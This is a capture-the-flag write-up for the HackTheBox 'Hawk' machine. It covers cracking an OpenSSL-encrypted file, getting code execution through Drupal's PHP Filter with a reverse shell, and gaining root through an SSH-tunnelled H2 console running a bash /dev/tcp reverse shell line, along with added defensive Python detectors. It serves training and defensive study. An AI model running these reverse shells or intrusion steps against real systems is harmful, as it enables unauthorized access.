HackTheBox — Hawk Writeup
Hawk is a medium-hard, OSCP-like Linux machine on Hack The Box, and it is very tricky.
In this box we get an OpenSSL-encrypted file after connecting to FTP, which we decrypt to get the password for Drupal. There is also an H2 database which we cannot reach directly, as it blocks remote connections. Once we are logged into Drupal we get code execution via a PHP reverse shell. Then we find the password for the user in a Drupal settings file, which we use to SSH-tunnel the H2 database to our Kali machine. Finally we get code execution through the H2 database and a root shell.
Enumeration
Honestly, in this box all ports will be useful, as you will see :) If you scan using the -sC flag (scan with default NSE scripts) it will show "Anonymous FTP allowed", so let's connect to FTP and, when it asks for a username, use "anonymous".
We find a file .drupal.txt.enc which we can download to our local Kali machine using the mget command. Let's pause for a second; before decoding this file, let's look at what is running on the other ports. We will get back to this file later.
Looking at the nmap scan we find ports 80 and 8082 open. Port 80 hosts a Drupal website (at the bottom of the image you can see "Powered by Drupal").
Port 8082 hosts an H2 console. However, it says it does not allow remote connections. (This hints that it allows local connections, and later we will do some local port forwarding to reach it :) Anyway, let's move on.)
I used dirsearch to find hidden directories and found some files, mainly Drupal configuration files.
Nothing interesting. I also scanned Drupal using droopescan.
I also tried an exploit, but it was of no use.
I even brute-forced the Drupal login page. A bonus tip: if you enter a username, Drupal will tell you whether it exists or not, just like WordPress. This confirms a user called "admin".
Honestly, I was stuck on this box and later found out that anonymous FTP login was allowed. I had not found this initially because I did not use the correct syntax during my nmap scan, which I regretted. So always enumerate well!
The file seems to contain data which is base64 encoded.
Let's decode it online.
The decoded output starts with Salted__ followed by binary bytes (it showed up as Salted__kY xxxxx), and I could not tell what format it was encoded in, so I used Google
and it turns out to be an OpenSSL-encrypted file with a salted password. (https://security.stackexchange.com/questions/124312/decrypting-binary-code-from-a-base64-string)
To find the password for this file we can use a tool that ships with Kali called bruteforce-salted-openssl; if you don't have it, google how to install it.
This took me a lot of time, as I learned that we also need to provide the cipher and the digest. Moreover, I had saved the base64-decoded text in a .txt file, which did not seem to work. After watching ippsec's video I found that you have to decode the file using the -d switch of the base64 utility.
As you can see, I base64-decoded the original file (which we got from FTP) and saved it as drupal_decoded.txt.enc (yes, we have to use the .enc extension).
Finally we use the bruteforce-salted-openssl tool. We use rockyou.txt as the wordlist and SHA256 as the digest, and finally get the password "friends".
Once we have the password, we google how to decrypt an OpenSSL file with a password and find this on the Stack Exchange website.
Let's run the command; we use aes-256-cbc, which is the default, and save the output in a file called resultss.txt.
Finally, after so much hassle, we get the password PencilKeyboardScanner123, which we can use to log into Drupal as admin. There is also a user called Daniel.
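What the Salted__ header actually is, as an added Python example (mine, not part of the original writeup and not the bruteforce-salted-openssl or openssl tools themselves): it splits the 8-byte magic and salt the way `openssl enc` writes them, and derives the AES-256-CBC key and IV from a password with OpenSSL's legacy EVP_BytesToKey, which is a single SHA-256 pass per candidate and the reason a wordlist runs through such a file so quickly. The salt and ciphertext bytes here are constructed; the real file's values are not on this page.

```python
import base64
import hashlib

MAGIC = b"Salted__"  # 8-byte header written by `openssl enc -salt` (the default)


def parse_salted_blob(blob: bytes):
    """Split raw `openssl enc` output into (salt, ciphertext).

    Layout: b"Salted__" | 8-byte salt | ciphertext (AES-CBC, PKCS#7 padded).
    Raises ValueError if the magic header is missing or the blob is truncated.
    """
    if not blob.startswith(MAGIC) or len(blob) < 16:
        raise ValueError("not an OpenSSL salted blob")
    return blob[8:16], blob[16:]


def digest(data: bytes, md: str = "sha256") -> bytes:
    """One hash pass; exposed so the derivation below can be checked step by step."""
    return hashlib.new(md, data).digest()


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int = 32,
                     iv_len: int = 16, md: str = "sha256"):
    """OpenSSL's legacy EVP_BytesToKey with count=1, i.e. what
    `openssl enc -md sha256` does when -pbkdf2 is not given:

        D_1 = H(password || salt)
        D_i = H(D_{i-1} || password || salt)
        key || iv = D_1 || D_2 || ...   (truncated to key_len + iv_len)

    For AES-256-CBC with SHA-256 the key is exactly D_1 and the IV is the first
    16 bytes of D_2: two hash calls per candidate password. That cheapness is
    what a wordlist attack relies on, and -pbkdf2 -iter N is the fix.
    """
    out = b""
    prev = b""
    while len(out) < key_len + iv_len:
        prev = digest(prev + password + salt, md)
        out += prev
    return out[:key_len], out[key_len:key_len + iv_len]


def decode_enc_file(text: str):
    """The FTP file was base64 text wrapping the raw blob (hence `base64 -d`
    before any tool would accept it). Decode, then parse."""
    return parse_salted_blob(base64.b64decode(text))


# Constructed sample: a fake salt and 32 bytes of fake ciphertext, base64-wrapped
# the way .drupal.txt.enc was. This is not the real file from the box.
SAMPLE_SALT = bytes(range(8))
SAMPLE_CIPHERTEXT = b"\xaa" * 32
SAMPLE_B64 = base64.b64encode(MAGIC + SAMPLE_SALT + SAMPLE_CIPHERTEXT).decode()


if __name__ == "__main__":
    salt, ct = decode_enc_file(SAMPLE_B64)
    key, iv = evp_bytes_to_key(b"friends", salt)
    print("salt:", salt.hex(), "ciphertext bytes:", len(ct))
    print("key:", key.hex())
    print("iv: ", iv.hex())
```

Feeding the returned key and IV into AES-256-CBC reproduces what `openssl enc -d -aes-256-cbc -md sha256` does with the same password. The defender's takeaway is that a file protected by a one-pass digest of a wordlist password is close to plaintext; encrypt with -pbkdf2 and a high -iter count, and use a passphrase that is not in rockyou.txt.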
EXPLOITING DRUPAL
After this it's pretty straightforward. We abuse a module/article to make Drupal run PHP code and get a reverse shell, just like we would in WordPress. You can refer to https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/drupal#code-execution-inside-drupal-with-admin-creds
Go to Modules -> (check) PHP Filter -> Save configuration
Then click Add content -> select Basic page or Article -> write the PHP shell code in the body -> select PHP code as the text format -> click Preview
For the reverse shell I used this one from pentestmonkey: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
To stabilise it run: python3 -c 'import pty; pty.spawn("/bin/bash")'
Now let's upload our linpeas script to the target. First we start a Python SimpleHTTPServer on our Kali box to host the files on port 9999,
and then run wget on the target to download the file, chmod +x to make linpeas.sh executable, and finally run it.
This is a bit tricky to notice at first, but we do not get any critical vulnerability in the results. However, among the processes running as root we see the H2 server being run via java.
Via Google we find that Drupal's database credentials are stored in the /sites/default/settings.php file (this is something I hadn't known either).
And we finally get the password for Daniel.
Let's use the password to SSH in as the daniel user.
Note that you will get a Python shell instead of a normal bash shell. In order to stabilise it you have to run import os and then os.system("bash"); all commands are shown above.
Again we can check that the H2 database is running using ps -ef | grep h2
If you remember, the H2 console on port 8082 tells us that remote connections are not allowed. BUT NOW we have access to the machine, so we can use local SSH tunnelling to reach it.
Local SSH tunnelling
ssh -L 9005:127.0.0.1:8082 daniel@10.10.10.102
format:
ssh -L local_port:destination_server_ip:remote_port ssh_server_hostname
In simple words, this tells the SSH server (Daniel's machine) to forward its port 8082 (running H2) to port 9005 on our Kali box.
Once you get a shell, run import os and then os.system("bash") to stabilise the shell.
Now just browse to 127.0.0.1:9005 on your Kali box and you will be able to reach the H2 console.
NOTE: SSH tunnelling can be a bit confusing. I would suggest watching ippsec's video, which covers local and remote SSH tunnelling.
On our Kali box we can run netstat -anlp | grep 9005 and see that our localhost (Kali) has ssh listening on port 9005.
We can try the default credentials of the H2 database;
however, they won't work.
The intended way is to log in with the username drupal and the password drupal4hawk, and in the JDBC URL we use Drupal after the slash; the part of the JDBC URL after the slash is basically the database name. You can also use any random name after the slash, like "zeus", and it creates a new database called zeus, as you can see below.
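The security point of the tunnelling section is that "remote connections not allowed" on the H2 console only means the listener is bound to loopback; any account that can SSH in reaches it through -L exactly as above. Here is an added Python example (mine, not from the writeup) that parses the listening-socket table from `ss -ltnp` on the target and reports the services reachable only through such a forward, so a defender can inventory what a single leaked SSH password exposes. The `ss` output below is constructed for the example; the process names are illustrative, and 8082 is the H2 console port from the box.

```python
import re

# Constructed `ss -ltnp` output (not captured from the box): one loopback-only
# service on 8082 over IPv4 and IPv6, plus two listeners exposed on all interfaces.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       50      127.0.0.1:8082       0.0.0.0:*          users:(("java",pid=1024,fd=12))
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=512,fd=3))
LISTEN  0       128     0.0.0.0:80           0.0.0.0:*          users:(("apache2",pid=700,fd=4))
LISTEN  0       50      [::1]:8082           [::]:*             users:(("java",pid=1024,fd=13))
"""

PROCESS_RE = re.compile(r'users:\(\("([^"]+)"')


def is_loopback(addr: str) -> bool:
    """127.0.0.0/8 or ::1: reachable from the host itself, and so through an SSH tunnel."""
    return addr.startswith("127.") or addr in ("[::1]", "::1")


def parse_ss_line(line: str):
    """Return (port, is_loopback, process) for one LISTEN row, or None for header/blank lines."""
    fields = line.split()
    if len(fields) < 5 or fields[0] != "LISTEN":
        return None
    addr, port = fields[3].rsplit(":", 1)
    m = PROCESS_RE.search(line)
    return int(port), is_loopback(addr), (m.group(1) if m else "?")


def loopback_only_listeners(lines):
    """Ports whose every LISTEN socket is bound to loopback, mapped to the process name.

    These are the services a "local connections only" policy protects from the
    network but not from anyone who can log in over SSH and run `ssh -L`.
    """
    bound = {}  # port -> (all sockets so far are loopback, process name)
    for line in lines:
        row = parse_ss_line(line)
        if row is None:
            continue
        port, loop, proc = row
        all_loop, _ = bound.get(port, (True, proc))
        bound[port] = (all_loop and loop, proc)
    return {port: proc for port, (all_loop, proc) in bound.items() if all_loop}


if __name__ == "__main__":
    for port, proc in sorted(loopback_only_listeners(SAMPLE_SS_OUTPUT.splitlines()).items()):
        print(f"port {port} ({proc}) is loopback-only: reachable through an SSH -L forward")
```

Run it over real `ss -ltnp` output piped from the host. Anything it lists should be treated as reachable by every local account, which is why an H2 console that also accepts a password lifted from settings.php is not protected by its bind address; the mitigation is to not run the console at all on a production host, or to require credentials that are not shared with the web application.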
Now there are two ways to exploit it to get root. You can either use an exploit or do it manually by running code.
This article mentions an exploit to directly get root: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/h2-java-sql-database
Here is the link to that exploit: https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed
What it basically does is create a database in H2, inject code and get a reverse shell. We will also cover the manual way later for a better understanding.
Let's download and run it. We use 127.0.0.1:9005 as we are reaching the H2 database through port 9005 on our local Kali machine.
Coming to the manual way: if you google how to exploit H2, you will find this article: https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html
It gives a command which you can run to execute anything, in this case the id command.
All we have to do is go to our daniel shell, go to the /tmp directory and create a file called exploit.sh containing the bash reverse shell:
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
Now chmod +x to make it executable,
and in your H2 console run CALL SHELLEXEC('/tmp/exploit.sh'),
which will execute the reverse shell as root, and we finally catch it using netcat.
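From the defender's side, the H2 step above works because CREATE ALIAS accepts either inline Java source (between $$ delimiters) or a reference to an arbitrary Java class, and the resulting function runs with the privileges of the H2 process, root in this box. Here is an added Python example, mine rather than code from the writeup or the linked article, that scans a stream of H2 SQL statements (as they appear in H2's trace log or a query log) and flags alias definitions and calls to user-defined aliases. The statements are constructed; the one inline alias body is a harmless placeholder, not the code from the linked article.

```python
import re

# The two alias forms H2's CREATE ALIAS accepts: inline Java source between $$
# delimiters, or a reference to an existing class/method given as FOR "...".
INLINE_SOURCE_RE = re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?ALIAS\b.*?\bAS\s+\$\$", re.I | re.S)
CLASS_REF_RE = re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?ALIAS\b.*?\bFOR\s+\"", re.I | re.S)
ALIAS_NAME_RE = re.compile(
    r"\bCREATE\s+(?:OR\s+REPLACE\s+)?ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?([A-Za-z_]\w*)", re.I)
CALL_RE = re.compile(r"\bCALL\s+([A-Za-z_]\w*)\s*\(", re.I)
# Java APIs that have no business inside a database function body.
DANGEROUS_JAVA_RE = re.compile(r"Runtime\.getRuntime|ProcessBuilder|java\.io\.File|java\.net\.")


def classify(stmt: str, defined_aliases=frozenset()):
    """Reasons one statement is suspicious (an empty list means it looks ordinary).

    defined_aliases: upper-cased names created earlier in the same log stream,
    so a CALL of a user-defined function is flagged while CALL ABS(-1) is not.
    """
    reasons = []
    if INLINE_SOURCE_RE.search(stmt):
        reasons.append("alias with inline Java source")
    if CLASS_REF_RE.search(stmt):
        reasons.append("alias bound to an arbitrary Java class")
    if DANGEROUS_JAVA_RE.search(stmt):
        reasons.append("process/file/network API inside SQL")
    m = CALL_RE.search(stmt)
    if m and m.group(1).upper() in defined_aliases:
        reasons.append(f"call to user-defined alias {m.group(1).upper()}")
    return reasons


def suspicious_statements(stmts):
    """Scan a statement stream in order; returns {index: reasons} for flagged ones."""
    defined = set()
    flagged = {}
    for i, stmt in enumerate(stmts):
        reasons = classify(stmt, frozenset(defined))
        if reasons:
            flagged[i] = reasons
        m = ALIAS_NAME_RE.search(stmt)
        if m:
            defined.add(m.group(1).upper())
    return flagged


# Constructed sample stream: Drupal-style queries plus alias activity. The alias
# body is a harmless placeholder, not the code from the linked article.
SAMPLE_STATEMENTS = [
    "SELECT uid, name FROM users WHERE name = 'admin'",
    "CREATE ALIAS UPPER_TRIM AS $$ String upperTrim(String s) { return s.trim().toUpperCase(); } $$",
    'CREATE ALIAS READ_PROP FOR "java.lang.System.getProperty"',
    "SELECT nid, title FROM node WHERE status = 1",
    "CALL UPPER_TRIM('  hawk  ')",
    "CALL ABS(-1)",
]

if __name__ == "__main__":
    for i, reasons in suspicious_statements(SAMPLE_STATEMENTS).items():
        print(f"[{i}] {SAMPLE_STATEMENTS[i][:60]} -> {', '.join(reasons)}")
```

Any hit on a production database deserves a look, since ordinary application traffic never defines functions. Beyond detection, the mitigations are to run H2 as an unprivileged user rather than root, to restrict which classes user-defined functions may reference with H2's h2.allowedClasses setting (assumed here from the H2 documentation; the page does not cover it), and to not expose the web console at all.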
CONCLUSION
I honestly think this box was very tricky and not too easy. However, it is very informative, as it teaches you a bunch of things like cryptography, SSH tunnelling, exploiting Drupal and exploiting an H2 database. If you learned from this writeup make sure to follow me here on Medium for more OSCP-like writeups.
- ZEUS